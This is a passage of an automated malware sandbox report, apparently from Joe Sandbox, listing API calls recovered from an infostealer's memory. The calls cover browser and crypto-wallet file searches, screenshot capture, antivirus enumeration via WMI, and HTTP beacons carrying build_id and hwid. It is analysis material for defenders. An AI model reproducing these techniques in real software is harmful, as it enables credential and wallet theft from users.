• LoadLibraryA.KERNEL32(kernel32.dll,004180E0), ref: 004181D5
• GetProcAddress.KERNEL32(00000000,015BF468), ref: 004181F0
• GetProcAddress.KERNEL32(74DD0000,015BF1F8), ref: 0041821D
• GetProcAddress.KERNEL32(74DD0000,015BF210), ref: 00418236
• GetProcAddress.KERNEL32(74DD0000,015BF1E0), ref: 0041824E
• GetProcAddress.KERNEL32(74DD0000,015BF480), ref: 00418266
• GetProcAddress.KERNEL32(74DD0000,015C2F60), ref: 0041827F
• GetProcAddress.KERNEL32(74DD0000,015C29E0), ref: 00418297
• GetProcAddress.KERNEL32(74DD0000,015C2C20), ref: 004182AF
• GetProcAddress.KERNEL32(74DD0000,015BF4B0), ref: 004182C8
• GetProcAddress.KERNEL32(74DD0000,015BF498), ref: 004182E0
• GetProcAddress.KERNEL32(74DD0000,015BF4C8), ref: 004182F8
• GetProcAddress.KERNEL32(74DD0000,015BF528), ref: 00418311
• GetProcAddress.KERNEL32(74DD0000,015C2A80), ref: 00418329
• GetProcAddress.KERNEL32(74DD0000,015BF540), ref: 00418341
• GetProcAddress.KERNEL32(74DD0000,015BF4E0), ref: 0041835A
• GetProcAddress.KERNEL32(74DD0000,015C2C40), ref: 00418372
• GetProcAddress.KERNEL32(74DD0000,015BF4F8), ref: 0041838A
• GetProcAddress.KERNEL32(74DD0000,015BF510), ref: 004183A3
• GetProcAddress.KERNEL32(74DD0000,015C2B00), ref: 004183BB
• GetProcAddress.KERNEL32(74DD0000,015BCAB8), ref: 004183D3
• GetProcAddress.KERNEL32(74DD0000,015C2D00), ref: 004183EC
• LoadLibraryA.KERNEL32(015CDAE0), ref: 004183FD
• LoadLibraryA.KERNEL32(015CD978), ref: 0041840F
• LoadLibraryA.KERNEL32(015CDB28), ref: 00418421
• LoadLibraryA.KERNEL32(015CDB70), ref: 00418432
• LoadLibraryA.KERNEL32(015CDA20), ref: 00418444
• GetProcAddress.KERNEL32(75A70000,015CDA38), ref: 00418460
• GetProcAddress.KERNEL32(75290000,015CDAC8), ref: 0041847C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75290000,015CDA08), ref: 00418494
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015CD8E8), ref: 004184B0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C2CA0), ref: 004184CC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76E90000,015C2DA0), ref: 004184E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004184FF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 2238633743-258108907
                                                                                                                                                                                                                                                    • Opcode ID: 70d1d3362bf3008d9a52891ea37fcc0450c629604f46aa634aabf3581718c65a
                                                                                                                                                                                                                                                    • Instruction ID: 18c1e4bf9447220ee0ff3f0e00010877e56fcb6e4a79cc5337be227af6316b6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d1d3362bf3008d9a52891ea37fcc0450c629604f46aa634aabf3581718c65a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C59144BDA00620EFE755DFA4ED48A2637BBF74AB01B106529EA05C7370EB749841CF64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*$2iA
                                                                                                                                                                                                                                                    • API String ID: 1425701045-4139583097
                                                                                                                                                                                                                                                    • Opcode ID: 7cbb2d5761f4a8bc48562a8c6c69247b2f0357e9c585ea0f3af39c2a6346f440
                                                                                                                                                                                                                                                    • Instruction ID: d5ba680260b222a762d84d7fa9107e161f6eca100296f6be478e7b18dfc97a61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cbb2d5761f4a8bc48562a8c6c69247b2f0357e9c585ea0f3af39c2a6346f440
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C1E8B5900219EBDB10EFA4DC85EEE7779EF48704F10855EF505A3281DB389E88CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,004268BA,004268B7,00000000,?,004269F8,?,?,004268B6,?,00000000,00000005), ref: 0040D2B4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004269FC), ref: 0040D31C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426A00), ref: 0040D336
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426A04,?,?,004268BB), ref: 0040D3E4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                    • String ID: Brave$E$Google Chrome$Opera GX$Preferences$P@$P@E$\BraveWallet\Preferences
                                                                                                                                                                                                                                                    • API String ID: 2567437900-2661835735
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404694
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,015CF640,?,015D2480,00000000,00000000,-00400100,00000000), ref: 004046D5
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004046FB
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0041F9D9,?,?,?,004266BD,00000000,0041F9D9,?,00000000,0041F9D9,",00000000,0041F9D9,build_id), ref: 004049CA
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004049E3
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049F4
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A0B
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404A5F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A6A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00404A7F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404A89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                    • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
                                                                                                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D36E4
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6D3773
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D377E
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D37BD
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6D37C4
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D37CB
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D3801
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D3883
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C6D3902
                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C6D3918
                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C6D394C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411C0B
                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00411C8A
                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00411C97
                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00411C9E
                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00411CA7
                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411CB8
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411CC3
                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411CE3
                                                                                                                                                                                                                                                    • GlobalFix.KERNEL32(000000FF), ref: 00411D5D
                                                                                                                                                                                                                                                    • GlobalSize.KERNEL32(000000FF), ref: 00411D6A
                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411DE9
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00411E07
                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00411E0E
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00411E16
                                                                                                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 00411E1D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                                                                    • String ID: image/jpeg
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00416B8B
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00416BA2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                                    • String ID: %s\%s
                                                                                                                                                                                                                                                    • API String ID: 111849568-4073750446
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110C3
                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244), ref: 004110D4
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427AC0,00000000,00000001,004279F0,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000,00000000), ref: 004110EE
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(DrB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427244,00000000), ref: 00411127
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00411182
                                                                                                                                                                                                                                                      • Part of subcall function 004114B0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004111AB,?,?,00000000,?,AV: ,00000000,?,00427244,00000000,?,00000000), ref: 004114B8
                                                                                                                                                                                                                                                      • Part of subcall function 004114B0: CharToOemW.USER32(?,00000000), ref: 004114C5
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004111BD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                    • String ID: DrB$Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                    • API String ID: 685420537-1356670634
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,00402025,?,00423330,?,00000000,00000000,?,00000000), ref: 00401376
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004013EC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 00401406
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,00402025,?,00423340,?,00000000), ref: 00401533
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 00401807
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 00401816
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401B64
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000), ref: 00401B73
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
